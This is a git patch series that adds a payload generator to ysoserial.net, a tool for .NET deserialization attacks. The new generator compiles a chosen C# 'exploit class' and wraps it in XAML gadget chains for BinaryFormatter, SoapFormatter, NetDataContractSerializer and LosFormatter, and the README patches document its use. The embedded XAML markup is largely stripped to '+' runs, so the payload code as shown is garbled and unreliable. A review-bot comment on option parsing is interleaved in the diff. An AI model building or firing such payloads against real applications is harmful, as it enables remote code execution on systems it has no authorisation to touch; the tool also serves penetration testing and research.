From 69183213182ddb23d444bae633a7b56d97bc4813 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov
Date: Thu, 1 Jun 2023 23:41:15 +0100
Subject: [PATCH 1/4] Added new generator XamlAssemblyLoadFromFileGenerator
---
 .../XamlAssemblyLoadFromFileGenerator.cs | 156 ++++++++++++++++++
 ysoserial/ysoserial.csproj | 3 +-
 2 files changed, 158 insertions(+), 1 deletion(-)
 create mode 100644 ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
diff --git a/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
new file mode 100644
index 0000000..43b8146
--- /dev/null
+++ b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
@@ -0,0 +1,156 @@
+using NDesk.Options;
+using System;
+using System.Collections.Generic;
+using System.IO.Compression;
+using System.IO;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+ public class XamlAssemblyLoadFromFileGenerator : GenericGenerator
+ {
+ public override string Name()
+ {
+ return "XamlAssemblyLoadFromFileGenerator";
+ }
+
+ public override string AdditionalInfo()
+ {
+ return "Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'";
+ }
+
+ public override string Finders()
+ {
+ return "Soroush Dalili";
+ }
+
+ public override string Contributors()
+ {
+ return "russtone";
+ }
+
+ public override List Labels()
+ {
+ return new List { GadgetTypes.NotBridgeButDervied };
+ }
+
+ public override List SupportedFormatters()
+ {
+ return new List { "BinaryFormatter", "SoapFormatter", "NetDataContractSerializer", "LosFormatter" };
+ }
+
+ int variant_number = 1;
+
+ public override OptionSet Options()
+ {
+ OptionSet options = new OptionSet()
+ {
+ {"var|variant=", "Choices: 1 -> use TypeConfuseDelegateGenerator [default], 2 -> use TextFormattingRunPropertiesMarshal", v => int.TryParse(v, out variant_number) },
+ };
+
+ return options;
+ }
+
+ public override object Generate(string formatter, InputArgs inputArgs)
+ {
+ var files = inputArgs.Cmd;
+ byte[] asmData = LocalCodeCompiler.CompileToAsmBytes(files);
+ byte[] gzipAsmData = Gzip(asmData);
+ string base64GzipAsmData = Convert.ToBase64String(gzipAsmData);
+
+
+ var xmlResourceDict = @" + + + " + base64GzipAsmData + @" + + + + + + + + + + + 0 + + + + + + " + asmData.Length + @" + + + + + + 0 + " + asmData.Length + @" + + + + + + + + + + + + + 0 + + + + + + 512 + + + + + + + + +";
+
+ if (inputArgs.Minify)
+ {
+ xmlResourceDict = XmlHelper.Minify(xmlResourceDict, null, null);
+ }
+
+ object obj;
+
+ if (variant_number == 1)
+ {
+ obj = TypeConfuseDelegateGenerator.GetXamlGadget(xmlResourceDict);
+ }
+ else
+ {
+ obj = new TextFormattingRunPropertiesMarshal(xmlResourceDict);
+ }
+
+ return Serialize(obj, formatter, inputArgs);
+ }
+
+ private static byte[] Gzip(byte[] data)
+ {
+ var outputStream = new MemoryStream();
+ var gzipStream = new GZipStream(outputStream, CompressionMode.Compress);
+ gzipStream.Write(data, 0, data.Length);
+ gzipStream.Close();
+ var res = outputStream.ToArray();
+ outputStream.Close();
+ return res;
+ }
+ }
+}
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
index bf77a64..fc3fc28 100755
--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -193,6 +193,7 @@ +
@@ -291,4 +292,4 @@ --> - \ No newline at end of file +
From 28b8417c839c9b327de03dae2ec50dcac52c4f93 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov
Date: Fri, 2 Jun 2023 10:28:02 +0100
Subject: [PATCH 2/4] Update README.md
---
 README.md | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/README.md b/README.md
index 43aa37e..e863a21 100644
--- a/README.md
+++ b/README.md
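Review bot: An unparseable `--variant` value silently selects the second gadget chain rather than the documented default: in `Options()` the handler `v => int.TryParse(v, out variant_number)` leaves `variant_number` at 0 when parsing fails, and `Generate` sends every value other than 1 down the `TextFormattingRunPropertiesMarshal` branch, contradicting the "[default]" in the option help. Rejecting bad input at parse time keeps the documented behaviour: `v => { if (!int.TryParse(v, out variant_number) || variant_number < 1 || variant_number > 2) throw new OptionException("variant must be 1 or 2", "variant"); }`. `Gzip` also creates its `MemoryStream` and `GZipStream` without `using` blocks, so an exception from `Write` leaks both; nesting the two streams in `using` statements and calling `outputStream.ToArray()` after the inner `GZipStream` block has closed (which flushes the gzip trailer) produces the same bytes without the manual `Close()` calls. The private field `variant_number` should also follow the C# convention used elsewhere for private fields, e.g. `_variantNumber`.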
@@ -184,6 +184,13 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter (*) WindowsPrincipal Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter Labels: Bridge and derived + (*) XamlAssemblyLoadFromFileGenerator [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] + Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter + Labels: Not bridge but derived + Extra options: + --var, --variant=VALUE Choices: 1 -> use TypeConfuseDelegateGenerator + [default], 2 -> use + TextFormattingRunPropertiesMarshal == PLUGINS == (*) ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
From 9b642d93adcc7bdaada19df70b051271f8b7fa55 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov
Date: Fri, 2 Jun 2023 10:32:26 +0100
Subject: [PATCH 3/4] Update README.md
---
 README.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index e863a21..d470c7a 100644
--- a/README.md
+++ b/README.md
@@ -565,6 +565,8 @@ Credits for available gadgets: [Finders: Levi Broderick] [Contributors: Alvaro Munoz, Soroush Dalili] WindowsPrincipal [Finders: Steven Seeley of Qihoo 360 Vulcan Team] [Contributors: Chris Anastasio] + XamlAssemblyLoadFromFileGenerator + [Finders: Soroush Dalili] [Contributors: russtone] Credits for available plugins: ActivatorUrl
From 399a4361a744912b05b2c4b490b39d793efbb5e1 Mon Sep 17 00:00:00 2001
From: Anton Prokhorov
Date: Fri, 2 Jun 2023 10:34:38 +0100
Subject: [PATCH 4/4] Rename: XamlAssemblyLoadFromFileGenerator -> XamlAssemblyLoadFromFile
---
 README.md | 4 ++--
 ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index d470c7a..3b5f05c 100644
--- a/README.md
+++ b/README.md
@@ -184,7 +184,7 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter (*) WindowsPrincipal Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter Labels: Bridge and derived - (*) XamlAssemblyLoadFromFileGenerator [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] + (*) XamlAssemblyLoadFromFile [Loads assembly using XAML. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll'] Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter Labels: Not bridge but derived Extra options:
@@ -565,7 +565,7 @@ Credits for available gadgets: [Finders: Levi Broderick] [Contributors: Alvaro Munoz, Soroush Dalili] WindowsPrincipal [Finders: Steven Seeley of Qihoo 360 Vulcan Team] [Contributors: Chris Anastasio] - XamlAssemblyLoadFromFileGenerator + XamlAssemblyLoadFromFile [Finders: Soroush Dalili] [Contributors: russtone] Credits for available plugins:
diff --git a/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
index 43b8146..47ca25f 100644
--- a/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
+++ b/ysoserial/Generators/XamlAssemblyLoadFromFileGenerator.cs
@@ -11,7 +11,7 @@ public class XamlAssemblyLoadFromFileGenerator : GenericGenerator
 {
 public override string Name()
 {
- return "XamlAssemblyLoadFromFileGenerator";
+ return "XamlAssemblyLoadFromFile";
 }
 public override string AdditionalInfo()